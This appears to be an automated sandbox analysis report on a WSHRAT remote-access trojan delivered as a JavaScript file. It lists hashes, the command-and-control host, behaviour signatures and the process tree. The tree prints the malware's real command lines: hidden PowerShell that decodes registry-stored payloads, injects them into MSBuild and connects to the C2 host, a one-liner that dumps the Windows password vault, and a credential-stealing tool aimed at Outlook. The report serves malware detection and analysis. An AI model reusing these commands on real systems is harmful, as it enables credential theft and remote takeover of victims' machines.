Analysis

  • max time kernel
    151s
  • max time network
    181s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14/10/2021, 10:12

General

  • Target

    ID-92164.js

  • Size

    1.0MB

  • MD5

    2e49ab9cb1bcc2aef854c4ea0f4172b9

  • SHA1

    9762fe64cdda7ca49f4247d8dd7497e8f6ef295e

  • SHA256

    f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e

  • SHA512

    3dfbbf4b7d3bd3091a3694319e9524baaf05b6db6c212fa73cbaf2df488a4aa104c057839434e7b766b8e2f603b94279d87f5139851516561397dd463c8f458f

Malware Config

Extracted

Family

wshrat

C2

http://3laallah.myvnc.com:5555

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • Blocklisted process makes network request 17 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 3 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Script User-Agent 15 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Windows\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
      2⤵
      • Runs .reg file with regedit
      PID:1176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
        PID:1516
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
        PID:1320
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
        PID:1920
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
        PID:1464
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
        PID:1016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:988
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      PID:1548
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:596
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1120
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook accounts
      PID:1760
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
      PID:1436

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/856-79-0x00000000023C0000-0x00000000023C1000-memory.dmp (Filesize: 4KB)
  • memory/856-82-0x000000001ABE4000-0x000000001ABE6000-memory.dmp (Filesize: 8KB)
  • memory/856-81-0x000000001ABE0000-0x000000001ABE2000-memory.dmp (Filesize: 8KB)
  • memory/856-80-0x00000000022E0000-0x00000000022E1000-memory.dmp (Filesize: 4KB)
  • memory/856-77-0x0000000002380000-0x0000000002381000-memory.dmp (Filesize: 4KB)
  • memory/856-78-0x000000001AC60000-0x000000001AC61000-memory.dmp (Filesize: 4KB)
  • memory/856-85-0x000000001C160000-0x000000001C161000-memory.dmp (Filesize: 4KB)
  • memory/856-84-0x000000001B700000-0x000000001B701000-memory.dmp (Filesize: 4KB)
  • memory/988-100-0x0000000002240000-0x0000000002241000-memory.dmp (Filesize: 4KB)
  • memory/988-103-0x000000001AC24000-0x000000001AC26000-memory.dmp (Filesize: 8KB)
  • memory/988-106-0x000000001B850000-0x000000001B851000-memory.dmp (Filesize: 4KB)
  • memory/988-105-0x0000000002470000-0x0000000002471000-memory.dmp (Filesize: 4KB)
  • memory/988-104-0x0000000001EC0000-0x0000000001EC1000-memory.dmp (Filesize: 4KB)
  • memory/988-102-0x000000001AC20000-0x000000001AC22000-memory.dmp (Filesize: 8KB)
  • memory/1176-61-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp (Filesize: 8KB)
  • memory/1176-62-0x0000000000410000-0x0000000000411000-memory.dmp (Filesize: 4KB)
  • memory/1548-171-0x0000000075C71000-0x0000000075C73000-memory.dmp (Filesize: 8KB)
  • memory/1640-72-0x000000001B480000-0x000000001B481000-memory.dmp (Filesize: 4KB)
  • memory/1640-67-0x000000001AB10000-0x000000001AB11000-memory.dmp (Filesize: 4KB)
  • memory/1640-66-0x0000000002410000-0x0000000002411000-memory.dmp (Filesize: 4KB)
  • memory/1640-69-0x000000001AA90000-0x000000001AA92000-memory.dmp (Filesize: 8KB)
  • memory/1640-70-0x000000001AA94000-0x000000001AA96000-memory.dmp (Filesize: 8KB)
  • memory/1640-71-0x0000000002370000-0x0000000002371000-memory.dmp (Filesize: 4KB)
  • memory/1640-73-0x000000001B7E0000-0x000000001B7E1000-memory.dmp (Filesize: 4KB)
  • memory/1640-68-0x00000000025F0000-0x00000000025F1000-memory.dmp (Filesize: 4KB)
  • memory/1680-93-0x000000001ABE0000-0x000000001ABE2000-memory.dmp (Filesize: 8KB)
  • memory/1680-94-0x000000001ABE4000-0x000000001ABE6000-memory.dmp (Filesize: 8KB)
  • memory/1680-96-0x0000000002400000-0x0000000002403000-memory.dmp (Filesize: 12KB)